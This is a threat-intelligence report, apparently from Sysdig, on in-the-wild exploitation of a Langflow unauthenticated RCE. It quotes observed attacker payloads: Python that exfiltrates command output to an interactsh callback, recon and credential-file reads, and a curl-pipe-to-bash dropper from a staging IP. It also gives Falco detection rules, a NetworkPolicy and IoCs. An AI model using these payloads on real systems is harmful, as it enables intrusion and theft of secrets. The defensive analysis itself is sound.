

On March 17, 2026, a critical vulnerability was disclosed in Langflow, the open-source visual framework for building AI agents and Retrieval-Augmented Generation (RAG) pipelines. The vulnerability, CVE-2026-33017, is an unauthenticated remote code execution (RCE) flaw in the public flow build endpoint that lets an attacker execute arbitrary Python code on any exposed Langflow instance: no credentials are required, and a single HTTP request is enough.
Within 20 hours of the advisory’s publication, the Sysdig Threat Research Team (TRT) observed the first exploitation attempts in the wild. No public proof-of-concept (PoC) code existed at the time. Attackers built working exploits directly from the advisory description and began scanning the internet for vulnerable instances. Exfiltrated information included keys and credentials, which provided access to connected databases and potential software supply chain compromise.
Within hours of the advisory, the Sysdig TRT deployed a fleet of honeypot nodes with vulnerable Langflow instances across multiple cloud providers and regions. What followed was a textbook demonstration of how quickly modern threat actors are operationalizing new vulnerabilities. Our findings are detailed below.
Timeline
The gap between advisory publication and first exploitation was approximately 20 hours. This is notable because no public PoC repository existed on GitHub at the time of the first attack. The advisory itself contained enough detail (the vulnerable endpoint path and the mechanism for code injection via flow node definitions) for attackers to construct a working exploit without additional research.
About CVE-2026-33017
Langflow is a popular open-source platform (145,000+ GitHub stars). It enables users to build AI workflows using a visual drag-and-drop interface. Langflow provides a REST API that allows programmatic interaction with flows, including building and executing them.
CVE-2026-33017 affects the POST /api/v1/build_public_tmp/{flow_id}/flow endpoint, which is designed to allow unauthenticated users to build public flows. The vulnerability arises because this endpoint accepts attacker-supplied flow data containing arbitrary Python code in node definitions, which is then executed server-side without sandboxing. This is distinct from CVE-2025-3248, an earlier Langflow RCE added to CISA's Known Exploited Vulnerabilities catalog in May 2025. CVE-2026-33017 has not yet been added to the KEV despite confirmed active exploitation.
What Sysdig TRT observed
Over the course of 48 hours following the advisory publication, we recorded CVE-2026-33017 exploit events from 6 unique source IPs across our honeypot fleet.
Phase 1: Automated Scanning (hours 20-21)
The earliest attempts at exploitation came from automated scanning infrastructure. Four source IPs arrived within minutes of each other, all sending an identical payload. These likely represent a single operator scanning through multiple proxies or VPS nodes rather than four independent attackers:
_r = __import__('os').popen('id').read()
_enc = __import__('base64').b64encode(_r.encode()).decode()
__import__('urllib.request').request.urlopen('http://<unique-subdomain>.oast.*//' + _enc)

The payload executes id, base64-encodes the output, and exfiltrates it to an interactsh callback server. Each request uses a unique interactsh subdomain, but the code template is identical across all IPs.
16:04:57 UTC — 77.110.106.154 → id → d6tcpc6fl...oast.* callback
16:05:23 UTC — 209.97.165.247 → id → d6tcpcjhc...oast.* callback
16:08:41 UTC — 188.166.209.86 → id → d6tcpe7ns...oast.* callback
16:39:32 UTC — 205.237.106.117 → id → d6td5s9qt...oast.* callback

The requests explicitly identify themselves as nuclei. Every exploit request includes the header Cookie: client_id=nuclei-scanner, and a preceding flow creation request names the flow nuclei-cve-2026-33017:
Cookie: client_id=nuclei-scanner
{"name": "nuclei-cve-2026-33017", "data": {"nodes": [], "edges": []}}

The self-identifying names are not the only evidence; other characteristics of the requests also point to nuclei as the scanning tool:
- User-Agent rotation: One IP (205.237.106.117) used seven different User-Agent (UA) strings across eight requests, including Knoppix;Linux i686 and Fedora;Linux i686. These strings appear in nuclei's random User-Agent wordlist and are not sent by any real browser.
- Identical payload template: Every request across all four IPs uses the same Python code structure with only the interactsh callback subdomain varying, consistent with a nuclei template using the {{interactsh-url}} placeholder.
At the time of this writing, no CVE-2026-33017 template exists in the official nuclei-templates repository. Therefore, what we identified is likely a privately authored template, written and deployed at scale within hours of disclosure. Whether the template author is the same person operating the scans or distributing the template to others is unclear from this data alone.
Phase 2: Custom exploit scripts (hours 21-24)
In contrast to the nuclei scans, a second class of attacker appeared using custom Python scripts (python-requests/2.32.3, consistent across all requests, no UA rotation). These operators moved beyond validation into active reconnaissance. One attacker (83.98.164.238) progressed through a methodical kill chain:
- Directory listing and credential files: ls -al /root; ls /app; cat /etc/passwd
- System fingerprint: id (returned uid=1000(langflow))
- Stage-2 delivery attempt: bash -c "$(curl -fsSL http://173.212.205.251:8443/z)"
The stage-2 dropper URL (http://173.212.205.251:8443/z) indicates the attacker had pre-staged infrastructure ready to deploy once they confirmed a vulnerable target. This is not ad-hoc testing. This is an attacker with a prepared exploitation toolkit moving from vulnerability validation to payload deployment in a single session.
Phase 3: Data harvesting (hours 24-30)
The most advanced activity came from IP 173.212.205.251, which conducted a thorough credential harvesting operation:
- Environment variable dump: Executed env to capture the full process environment, which in a typical Langflow deployment includes database connection strings, API keys, and cloud credentials.
- File system enumeration: Ran find /app -name "*.db" -o -name "*.env" to locate configuration files and databases.
- Targeted file reads: Extracted the contents of .env files containing application secrets.
Shared infrastructure
Two of the source IPs running custom exploit scripts (83.98.164.238 and 173.212.205.251) both exfiltrated data to the same command-and-control server at 143.110.183.86:8080. The stage-2 dropper was also hosted on 173.212.205.251:8443. This overlap likely indicates a single operator working through multiple proxies or VPS nodes, though it could also reflect a shared exploitation toolkit.
What this means for defenders
The 20-hour window between advisory publication and first exploitation is consistent with an accelerating trend that the Zero Day Clock project has been tracking across 83,000+ CVEs. The data shows the median time-to-exploit (TTE) has collapsed from 771 days in 2018 to just hours in 2024. By 2023, 44% of exploited vulnerabilities were weaponized within 24 hours of disclosure, and 80% of public exploits appeared before the official advisory was even published. Our observation of CVE-2026-33017 fits squarely in this trend: working exploits appeared within a day, built from nothing more than the advisory text.
This timeline compression poses serious challenges for defenders. The median time for organizations to deploy patches is approximately 20 days, meaning defenders are exposed and vulnerable for far too long. Threat actors are monitoring the same advisory feeds that defenders use, and they are building exploits faster than most organizations can assess, test, and deploy patches. Organizations must completely reconsider their vulnerability programs to meet reality.
Furthermore, several factors likely made CVE-2026-33017 particularly attractive to attackers:
- No authentication required. The vulnerable endpoint is publicly accessible by design, meaning mass scanning is trivially automated.
- Simple exploitation. The attack requires a single HTTP POST request with a JSON payload: no multi-step chains, no session management, no CSRF tokens.
- Massive attack surface. Langflow's 145,000+ GitHub stars point to a large installed base, and with it a large number of exposed instances. Many are deployed by data science teams who may not follow the same patching cadence as production infrastructure.
- High-value targets and software supply chain compromise. Langflow instances are configured with API keys for OpenAI, Anthropic, AWS, and database connections. Compromising one instance can provide lateral access to cloud accounts and data stores.
Runtime detection
When the patch window collapses to hours, runtime detection becomes the primary line of defense. The exploitation patterns observed in this campaign produce clear signals at the system call level that tools like Falco and Sysdig Secure are designed to catch, without any prior knowledge of the specific CVE.
Every attacker in this campaign followed the same post-exploitation playbook: execute a shell command via Python's os.popen(), then exfiltrate the output over HTTP. Each stage of this kill chain maps to Falco rules that ship out of the box with Sysdig Secure:
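As an added illustration written for this article (not the rule set that ships with Falco or Sysdig Secure), the Falco rules below describe each stage of that playbook in syscall terms: the interpreter forking a shell (os.popen runs /bin/sh -c), discovery binaries running under that shell, reads of /etc/passwd and .env/.db files, and outbound connections from the process tree to ports the application has no reason to use. The interpreter names, the /app path, and the allowed-port list are assumptions about a typical containerized Langflow deployment and must be tuned to your environment.

```yaml
# Added example for this article: Falco rules describing the behaviours observed in the
# campaign. They are NOT the out-of-the-box rule set shipped with Falco or Sysdig Secure.
# Assumptions: Langflow runs in a container under a Python interpreter or uvicorn, with the
# application under /app; the allowed-port list is a placeholder to be tuned per environment.

- list: langflow_interpreters
  items: [python, python3, python3.11, python3.12, python3.13, uvicorn]

- list: shell_binaries
  items: [sh, bash, dash, ash, zsh]

- list: recon_binaries
  items: [id, whoami, env, cat, ls, find, uname, hostname]

# Ports the Langflow interpreter legitimately talks to (HTTPS APIs, Postgres). Tune this.
- list: langflow_allowed_ports
  items: [443, 5432]

- macro: container
  condition: (container.id != host)

- macro: spawned_process
  condition: (evt.type = execve and evt.dir = <)

- macro: open_read
  condition: (evt.type in (open, openat, openat2) and evt.is_open_read = true and fd.typechar = 'f')

- macro: outbound
  condition: >
    (evt.type = connect and evt.dir = < and fd.typechar = 4 and
     fd.ip != "0.0.0.0" and fd.net != "127.0.0.0/8" and
     (evt.rawres >= 0 or evt.res = EINPROGRESS))

# Stage 1 of every payload: os.popen() makes the interpreter fork /bin/sh -c "<cmd>".
- rule: Shell Spawned by Langflow Interpreter
  desc: A Python interpreter serving Langflow executed a shell, as os.popen() and subprocess do.
  condition: >
    spawned_process and container and
    proc.name in (shell_binaries) and proc.pname in (langflow_interpreters)
  output: >
    Shell spawned by Langflow interpreter (cmdline=%proc.cmdline parent=%proc.pcmdline
    user=%user.name container=%container.name image=%container.image.repository)
  priority: WARNING
  tags: [langflow, rce, execution]

# Phase 2 recon: id, cat /etc/passwd, ls /root, env, find ... run from that shell.
- rule: Discovery Command Under Langflow Interpreter
  desc: A discovery binary ran with a Langflow interpreter somewhere in its ancestry.
  condition: >
    spawned_process and container and
    proc.name in (recon_binaries) and proc.aname in (langflow_interpreters)
  output: >
    Discovery command under Langflow (cmdline=%proc.cmdline parent=%proc.pname
    container=%container.name)
  priority: NOTICE
  tags: [langflow, discovery]

# Phase 3 harvesting: reads of /etc/passwd and of .env / .db files under /app.
- rule: Secrets File Read by Langflow Process Tree
  desc: A process descended from the Langflow interpreter read credential material.
  condition: >
    open_read and container and proc.aname in (langflow_interpreters) and
    (fd.name in (/etc/passwd, /etc/shadow) or
     (fd.name startswith /app and (fd.name endswith .env or fd.name endswith .db)))
  output: >
    Secrets file read (file=%fd.name proc=%proc.name cmdline=%proc.cmdline
    container=%container.name)
  priority: WARNING
  tags: [langflow, credential_access]

# Exfiltration and stage-2 download: the plain-HTTP interactsh callback from the interpreter
# itself and the curl to :8443 under it both leave the process tree on an unexpected port.
- rule: Unexpected Outbound Connection from Langflow Tree
  desc: Outbound connection from the Langflow process tree to a port outside the allow list.
  condition: >
    outbound and container and
    (proc.name in (langflow_interpreters) or proc.aname in (langflow_interpreters)) and
    not fd.sport in (langflow_allowed_ports)
  output: >
    Unexpected outbound connection from Langflow (dest=%fd.sip:%fd.sport proc=%proc.name
    cmdline=%proc.cmdline container=%container.name)
  priority: WARNING
  tags: [langflow, exfiltration, command_and_control]
```

None of these conditions mention the CVE, the endpoint, or the payload text; they describe what the payload has to do once it runs. The first rule alone covers every request seen in this campaign, since each one went through os.popen(). The outbound rule is the noisiest: a Langflow instance that legitimately calls HTTP services on non-standard ports needs those ports added to the allow list, or the rule scoped to child processes such as curl and wget rather than the interpreter itself.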
The key advantage of runtime detection in this context is that it works on day zero. These rules do not require a signature for CVE-2026-33017 specifically because they detect the exploitation behavior, not the vulnerability. The same rules would fire regardless of whether the initial access came through CVE-2026-33017, CVE-2025-3248, or any other RCE in an application.
Indicators of Compromise
Source IPs
77.110.106.154
209.97.165.247
188.166.209.86
205.237.106.117
83.98.164.238
173.212.205.251
C2 and staging infrastructure
143.110.183.86:8080 (exfiltration target shared by the custom-script operators)
173.212.205.251:8443 (stage-2 staging host; also a scanning source)
Dropper URLs
http://143.110.183.86:8080/
http://173.212.205.251:8443/z
Interactsh callback domains
Twelve unique interactsh subdomains were observed across the nuclei scanning activity, under the .oast.live, .oast.me, .oast.pro, and .oast.fun domains. Four samples:
d6tcpc6flblph01gdcb0ku9ixih393m54.oast.live
d6tcpe7nsv6kk9rdrpggi37zmjfxw9imr.oast.me
d6td5s9qte0bea7273e0wuou77jjx77uk.oast.pro
d6tgbe1qte0a8rkffb3gqabqm8517exd3.oast.fun

Note: Source IPs may be proxies or VPS nodes rather than the operator's true origin. The interactsh subdomains are ephemeral and rotate per scan.
Recommendations
- Update Langflow immediately. If a patched version is not yet available, restrict network access to the /api/v1/build_public_tmp endpoint or disable public flow building entirely.
- Audit environment variables and secrets on any publicly exposed Langflow instance. Rotate API keys, database passwords, and cloud credentials as a precaution.
- Monitor for outbound connections to unusual ports or known callback services (interact.sh and the oast.* domains used by interactsh, oastify.com, dnslog.cn), which indicate active exploitation and data exfiltration.
- Restrict network access to Langflow instances using firewall rules or a reverse proxy with authentication. Langflow should not be directly exposed to the internet without an authentication layer.
- Inventory the AI/ML tooling in your environment. Platforms like Langflow, n8n, and other workflow automation tools are increasingly targeted because they often run with broad API access and are deployed outside of standard security review processes.
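As an added illustration of the network-restriction recommendations above (written for this article; it is not configuration from the Langflow project or from Sysdig), the following Kubernetes NetworkPolicy puts a Langflow deployment behind an authenticating proxy and default-denies its egress. Everything about the cluster is assumed: the namespace langflow, the labels app=langflow, app=auth-proxy, app=postgres and app=egress-proxy, the port numbers, and the use of kube-dns. The point it demonstrates is that with egress limited to DNS, the database, and an HTTPS egress proxy, both the interactsh callback and the curl to 173.212.205.251:8443 seen in this campaign would have failed at the network layer even after the RCE succeeded.

```yaml
# Added example: Kubernetes NetworkPolicy for a Langflow deployment (written for this
# article, not shipped by Langflow or Sysdig). All names, labels and ports are assumptions:
#   - Langflow pods carry app=langflow and listen on 7860 (Langflow's default port)
#   - an authenticating reverse proxy runs in the same namespace as app=auth-proxy
#   - Postgres runs as app=postgres; LLM provider APIs are reached via app=egress-proxy
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: langflow-restrict
  namespace: langflow
spec:
  podSelector:
    matchLabels:
      app: langflow
  # Listing both types makes anything not matched below a deny, for ingress and egress.
  policyTypes: [Ingress, Egress]
  ingress:
    # Only the authenticating proxy may reach Langflow's HTTP port. Nothing on the
    # internet, and no other pod, can hit /api/v1/build_public_tmp directly.
    - from:
        - podSelector:
            matchLabels:
              app: auth-proxy
      ports:
        - protocol: TCP
          port: 7860
  egress:
    # Name resolution via kube-dns in kube-system (namespace AND pod selector).
    - to:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: kube-system
          podSelector:
            matchLabels:
              k8s-app: kube-dns
      ports:
        - protocol: UDP
          port: 53
        - protocol: TCP
          port: 53
    # The application database.
    - to:
        - podSelector:
            matchLabels:
              app: postgres
      ports:
        - protocol: TCP
          port: 5432
    # Outbound HTTPS to LLM APIs goes through a forward proxy, so the proxy's logs
    # become the place to look for unexpected destinations. Arbitrary internet egress,
    # including plain HTTP to interactsh domains or a :8443 staging host, is denied.
    - to:
        - podSelector:
            matchLabels:
              app: egress-proxy
      ports:
        - protocol: TCP
          port: 3128
```

NetworkPolicy is only enforced by a CNI that implements it, so verify enforcement (for example, by exec-ing into the pod and attempting a connection to an unlisted port) rather than assuming it. The policy complements rather than replaces the endpoint restriction: the proxy in front of Langflow should still deny the /api/v1/build_public_tmp path until the instance is patched, and the secrets reachable from the pod should still be rotated.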
Conclusion
CVE-2026-33017, whose advisory alone gave threat actors enough to build working exploits, demonstrates a pattern that is becoming the norm rather than the exception: critical vulnerabilities in popular open-source tools are weaponized within hours of disclosure, often before public PoC code is even available. Furthermore, AI workloads are increasingly falling into threat actors' crosshairs because they offer high-value data and software supply chain access, and they often lack robust security. As Zero Day Clock makes clear, this is not an outlier. The collapse from months-long exploitation timelines to same-day weaponization is a structural shift in how vulnerabilities are exploited today.
For defenders, the practical takeaway is that the window between "advisory publication" and "active exploitation" is now measured in hours, not days or weeks. Organizations that rely on scheduled patch cycles to address critical vulnerabilities are operating on a timeline that attackers have already outpaced. Runtime detection, network segmentation, and rapid response capabilities are essential to bridging the gap between disclosure and remediation.
